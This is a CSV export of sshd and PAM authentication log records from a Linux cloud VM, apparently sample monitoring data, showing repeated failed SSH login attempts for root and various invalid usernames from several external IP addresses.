+5907,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:33:50,UbuntuDevEnv,2019-06-26 16:33:49,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 53678:11: Normal Shutdown, Thank you for playing [preauth]",37513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,53678,,
+5908,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:04,UbuntuDevEnv,2019-06-26 16:34:04,auth,UbuntuDevEnv,info,Invalid user protocol from 81.0.212.18 port 41337,37581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,protocol,81.0.212.1,41337,,
+5909,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:04,UbuntuDevEnv,2019-06-26 16:34:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,37581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+5910,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:04,UbuntuDevEnv,2019-06-26 16:34:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5911,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:06,UbuntuDevEnv,2019-06-26 16:34:05,auth,UbuntuDevEnv,info,Failed password for invalid user protocol from 81.0.212.18 port 41337 ssh2,37581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,protocol,81.0.212.1,41337,,
+5912,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:06,UbuntuDevEnv,2019-06-26 16:34:05,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 41337:11: Bye Bye [preauth],37581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,41337,,
+5913,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:06,UbuntuDevEnv,2019-06-26 16:34:06,auth,UbuntuDevEnv,info,Disconnected from invalid user protocol 81.0.212.18 port 41337 [preauth],37581,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,protocol,81.0.212.1,41337,,
+5914,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:21,UbuntuDevEnv,2019-06-26 16:34:20,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5915,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:23,UbuntuDevEnv,2019-06-26 16:34:23,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 56996 ssh2,37640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,56996,,
+5916,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:23,UbuntuDevEnv,2019-06-26 16:34:23,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 56996 [preauth],37640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,56996,,
+5917,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:23,UbuntuDevEnv,2019-06-26 16:34:23,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 56996:11: Normal Shutdown, Thank you for playing [preauth]",37640,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,56996,,
+5918,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:56,UbuntuDevEnv,2019-06-26 16:34:56,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5919,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:59,UbuntuDevEnv,2019-06-26 16:34:58,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 60290 ssh2,37767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,60290,,
+5920,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:59,UbuntuDevEnv,2019-06-26 16:34:58,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 60290:11: Normal Shutdown, Thank you for playing [preauth]",37767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,60290,,
+5921,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:34:59,UbuntuDevEnv,2019-06-26 16:34:58,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 60290 [preauth],37767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,60290,,
+5922,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:06,UbuntuDevEnv,2019-06-26 16:35:05,auth,UbuntuDevEnv,info,Invalid user lara from 171.8.199.77 port 40530,37793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lara,171.8.199.7,40530,,
+5923,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:06,UbuntuDevEnv,2019-06-26 16:35:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5924,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:06,UbuntuDevEnv,2019-06-26 16:35:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=171.8.199.77,37793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,171.8.199.7,,0,
+5925,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:08,UbuntuDevEnv,2019-06-26 16:35:07,auth,UbuntuDevEnv,info,Failed password for invalid user lara from 171.8.199.77 port 40530 ssh2,37793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lara,171.8.199.7,40530,,
+5926,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:08,UbuntuDevEnv,2019-06-26 16:35:08,auth,UbuntuDevEnv,info,Received disconnect from 171.8.199.77 port 40530:11: Bye Bye [preauth],37793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,171.8.199.7,40530,,
+5927,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:08,UbuntuDevEnv,2019-06-26 16:35:08,auth,UbuntuDevEnv,info,Disconnected from invalid user lara 171.8.199.77 port 40530 [preauth],37793,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,lara,171.8.199.7,40530,,
+5928,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:13,UbuntuDevEnv,2019-06-26 16:35:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37836,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5929,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:14,UbuntuDevEnv,2019-06-26 16:35:13,auth,UbuntuDevEnv,info,Invalid user team from 66.70.130.155 port 38198,37829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,team,66.70.130.1,38198,,
+5930,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:14,UbuntuDevEnv,2019-06-26 16:35:13,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=66.70.130.155,37829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,66.70.130.1,,0,
+5931,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:14,UbuntuDevEnv,2019-06-26 16:35:13,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5932,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:15,UbuntuDevEnv,2019-06-26 16:35:14,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 35354 ssh2,37836,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,35354,,
+5933,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:15,UbuntuDevEnv,2019-06-26 16:35:14,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 35354 [preauth],37836,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,35354,,
+5934,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:15,UbuntuDevEnv,2019-06-26 16:35:14,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 35354:11: Normal Shutdown, Thank you for playing [preauth]",37836,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,35354,,
+5935,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:16,UbuntuDevEnv,2019-06-26 16:35:15,auth,UbuntuDevEnv,info,Failed password for invalid user team from 66.70.130.155 port 38198 ssh2,37829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,team,66.70.130.1,38198,,
+5936,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:16,UbuntuDevEnv,2019-06-26 16:35:15,auth,UbuntuDevEnv,info,Disconnected from invalid user team 66.70.130.155 port 38198 [preauth],37829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,team,66.70.130.1,38198,,
+5937,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:16,UbuntuDevEnv,2019-06-26 16:35:15,auth,UbuntuDevEnv,info,Received disconnect from 66.70.130.155 port 38198:11: Bye Bye [preauth],37829,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,66.70.130.1,38198,,
+5938,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:20,UbuntuDevEnv,2019-06-26 16:35:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5939,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:22,UbuntuDevEnv,2019-06-26 16:35:22,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 38620 ssh2,37862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,38620,,
+5940,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:22,UbuntuDevEnv,2019-06-26 16:35:22,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 38620:11: Normal Shutdown, Thank you for playing [preauth]",37862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,38620,,
+5941,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:22,UbuntuDevEnv,2019-06-26 16:35:22,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 38620 [preauth],37862,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,38620,,
+5942,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:27,UbuntuDevEnv,2019-06-26 16:35:26,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5943,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:28,UbuntuDevEnv,2019-06-26 16:35:28,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 41898 ssh2,37896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,41898,,
+5944,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:29,UbuntuDevEnv,2019-06-26 16:35:28,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 41898 [preauth],37896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,41898,,
+5945,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:29,UbuntuDevEnv,2019-06-26 16:35:28,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 41898:11: Normal Shutdown, Thank you for playing [preauth]",37896,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,41898,,
+5946,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:34,UbuntuDevEnv,2019-06-26 16:35:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93  user=root,37922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,35.154.19.9,,0,
+5947,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:36,UbuntuDevEnv,2019-06-26 16:35:35,auth,UbuntuDevEnv,info,Invalid user pmail from 81.0.212.18 port 50628,37932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pmail,81.0.212.1,50628,,
+5948,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:36,UbuntuDevEnv,2019-06-26 16:35:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5949,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:36,UbuntuDevEnv,2019-06-26 16:35:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=81.0.212.18,37932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,81.0.212.1,,0,
+5950,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:36,UbuntuDevEnv,2019-06-26 16:35:36,auth,UbuntuDevEnv,info,Failed password for root from 35.154.19.93 port 45168 ssh2,37922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,45168,,
+5951,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:36,UbuntuDevEnv,2019-06-26 16:35:36,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 45168:11: Normal Shutdown, Thank you for playing [preauth]",37922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,45168,,
+5952,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:36,UbuntuDevEnv,2019-06-26 16:35:36,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 35.154.19.93 port 45168 [preauth],37922,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,35.154.19.9,45168,,
+5953,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:38,UbuntuDevEnv,2019-06-26 16:35:37,auth,UbuntuDevEnv,info,Failed password for invalid user pmail from 81.0.212.18 port 50628 ssh2,37932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pmail,81.0.212.1,50628,,
+5954,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:38,UbuntuDevEnv,2019-06-26 16:35:37,auth,UbuntuDevEnv,info,Disconnected from invalid user pmail 81.0.212.18 port 50628 [preauth],37932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,pmail,81.0.212.1,50628,,
+5955,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:38,UbuntuDevEnv,2019-06-26 16:35:37,auth,UbuntuDevEnv,info,Received disconnect from 81.0.212.18 port 50628:11: Bye Bye [preauth],37932,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,81.0.212.1,50628,,
+5956,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:42,UbuntuDevEnv,2019-06-26 16:35:42,auth,UbuntuDevEnv,info,Invalid user admin from 35.154.19.93 port 48434,37949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,35.154.19.9,48434,,
+5957,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:42,UbuntuDevEnv,2019-06-26 16:35:42,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,37949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5958,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:42,UbuntuDevEnv,2019-06-26 16:35:42,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,37949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+5959,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:45,UbuntuDevEnv,2019-06-26 16:35:44,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 35.154.19.93 port 48434 ssh2,37949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,35.154.19.9,48434,,
+5960,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:45,UbuntuDevEnv,2019-06-26 16:35:45,auth,UbuntuDevEnv,info,Disconnected from invalid user admin 35.154.19.93 port 48434 [preauth],37949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,35.154.19.9,48434,,
+5961,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:35:45,UbuntuDevEnv,2019-06-26 16:35:45,auth,UbuntuDevEnv,info,"Received disconnect from 35.154.19.93 port 48434:11: Normal Shutdown, Thank you for playing [preauth]",37949,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,35.154.19.9,48434,,
+5962,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:04,UbuntuDevEnv,2019-06-26 16:36:04,auth,UbuntuDevEnv,info,Invalid user admin from 35.154.19.93 port 51732,38034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,35.154.19.9,51732,,
+5963,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:04,UbuntuDevEnv,2019-06-26 16:36:04,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,38034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+5964,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:04,UbuntuDevEnv,2019-06-26 16:36:04,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=35.154.19.93,38034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,35.154.19.9,,0,
+5965,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 16:36:06,UbuntuDevEnv,2019-06-26 16:36:06,auth,UbuntuDevEnv,info,Failed password for invalid user admin from 35.154.19.93 port 51732 ssh2,38034,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,admin,35.154.19.9,51732,,
